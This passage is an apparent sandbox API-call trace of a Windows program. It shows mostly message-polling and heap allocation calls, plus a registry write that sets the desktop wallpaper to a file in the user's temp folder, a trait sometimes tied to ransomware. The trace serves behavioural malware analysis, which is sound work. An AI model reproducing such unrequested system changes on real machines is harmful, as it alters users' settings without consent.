hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0295.074] Sleep (dwMilliseconds=0xa) [0295.091] timeGetTime () returned 0x49c2e [0295.091] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0295.091] Sleep (dwMilliseconds=0xa) [0295.106] timeGetTime () returned 0x49c3d [0295.106] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0295.106] Sleep (dwMilliseconds=0xa) [0295.121] timeGetTime () returned 0x49c4d [0295.121] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0295.121] Sleep (dwMilliseconds=0xa) [0295.137] timeGetTime () returned 0x49c5d [0295.137] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0295.137] Sleep (dwMilliseconds=0xa) [0295.153] timeGetTime () returned 0x49c6c [0295.153] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0295.153] Sleep (dwMilliseconds=0xa) [0295.168] timeGetTime () returned 0x49c7c [0295.168] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0295.168] Sleep (dwMilliseconds=0xa) [0295.184] timeGetTime () returned 0x49c8b [0295.184] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0295.184] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0295.184] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0295.184] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0295.184] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0295.184] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0295.184] Sleep (dwMilliseconds=0xa) [0295.200] timeGetTime () returned 0x49c9b [0295.200] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0295.200] Sleep (dwMilliseconds=0xa) [0295.215] timeGetTime () returned 0x49cab [0295.215] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0295.215] Sleep (dwMilliseconds=0xa) [0295.230] timeGetTime () returned 0x49cba [0295.230] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0295.230] Sleep (dwMilliseconds=0xa) [0295.246] timeGetTime () returned 0x49cca [0295.246] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0295.246] Sleep (dwMilliseconds=0xa) [0295.262] timeGetTime () returned 0x49cd9 [0295.262] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0295.262] Sleep (dwMilliseconds=0xa) [0295.277] timeGetTime () returned 0x49ce9 [0295.277] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0295.277] Sleep (dwMilliseconds=0xa) [0295.293] timeGetTime () returned 0x49cf9 [0295.293] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0295.293] Sleep (dwMilliseconds=0xa) [0295.308] timeGetTime () returned 0x49d08 [0295.308] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0295.309] Sleep (dwMilliseconds=0xa) [0295.324] timeGetTime () returned 0x49d18 [0295.324] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0295.324] Sleep (dwMilliseconds=0xa) [0295.340] timeGetTime () returned 0x49d27 [0295.340] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0295.340] Sleep (dwMilliseconds=0xa) [0295.355] timeGetTime () returned 0x49d37 [0295.355] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0295.355] Sleep (dwMilliseconds=0xa) [0295.371] timeGetTime () returned 0x49d47 [0295.371] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0295.372] Sleep (dwMilliseconds=0xa) [0295.401] timeGetTime () returned 0x49d56 [0295.401] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0295.401] Sleep (dwMilliseconds=0xa) [0295.402] timeGetTime () returned 0x49d66 [0295.402] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0295.402] Sleep (dwMilliseconds=0xa) [0295.418] timeGetTime () returned 0x49d75 [0295.418] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0295.418] Sleep (dwMilliseconds=0xa) [0295.433] timeGetTime () returned 0x49d85 [0295.433] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0295.433] Sleep (dwMilliseconds=0xa) [0295.449] timeGetTime () returned 0x49d95 [0295.449] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0295.449] Sleep (dwMilliseconds=0xa) [0295.464] timeGetTime () returned 0x49da4 [0295.465] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0295.465] Sleep (dwMilliseconds=0xa) [0295.480] timeGetTime () returned 0x49db4 [0295.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0295.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0295.481] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0295.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0295.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0295.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0295.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0295.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0295.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0295.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0295.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0295.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0295.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0295.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0295.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0295.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0295.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0295.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0295.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0295.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0295.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0295.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0295.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0295.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0295.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0295.483] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0295.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0295.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0295.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa820 [0295.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0295.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0295.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa748 [0295.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0295.483] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf440 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0295.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0295.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0295.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0295.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0295.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0295.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0295.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0295.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0295.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0295.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0295.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0295.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0295.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0295.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0295.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0295.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0295.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0295.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0295.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0295.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0295.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0295.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0295.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0295.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0295.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0295.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0295.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0295.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0295.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0295.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0295.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0295.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b35e0 [0295.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0295.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0295.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0295.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0295.488] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0295.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0295.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0295.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0295.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0295.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0295.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0295.488] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8bf858, lpdwDisposition=0x8bf874 | out: phkResult=0x8bf858*=0x294, lpdwDisposition=0x8bf874*=0x2) returned 0x0 [0295.488] RegSetValueExW (in: hKey=0x294, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg", cbData=0x58 | out: lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0295.489] RegCloseKey (hKey=0x294) returned 0x0 [0295.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b35e0 | out: hHeap=0x25c0000) returned 1 [0295.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0295.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0295.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0295.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0295.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0295.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0295.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0295.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0295.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0295.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0295.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0295.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0295.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0295.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0295.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0295.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0295.490] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0295.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0295.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0295.490] CharUpperBuffW (in: lpsz="A4200F01243", cchLength=0xb | out: lpsz="A4200F01243") returned 0xb [0295.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0295.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0295.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0295.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1898 [0295.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0295.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0295.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0295.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0295.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2058 [0295.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0295.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0295.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0295.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0295.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0295.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0295.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0295.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0295.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0295.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0295.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0295.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8b0 [0295.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0295.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0295.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0295.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0295.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0295.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0295.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0295.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0295.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0295.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0295.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0295.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0295.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0295.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5b0 [0295.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa400 [0295.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0295.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0295.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0295.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0295.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0295.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0295.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0295.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0295.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0295.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0295.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0295.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0295.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa400 [0295.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5b0 [0295.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0295.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0295.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0295.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0295.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0295.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0295.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0295.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0295.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0295.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0295.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0295.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0295.495] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0295.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0295.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0295.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0295.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0295.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0295.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0295.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0295.496] 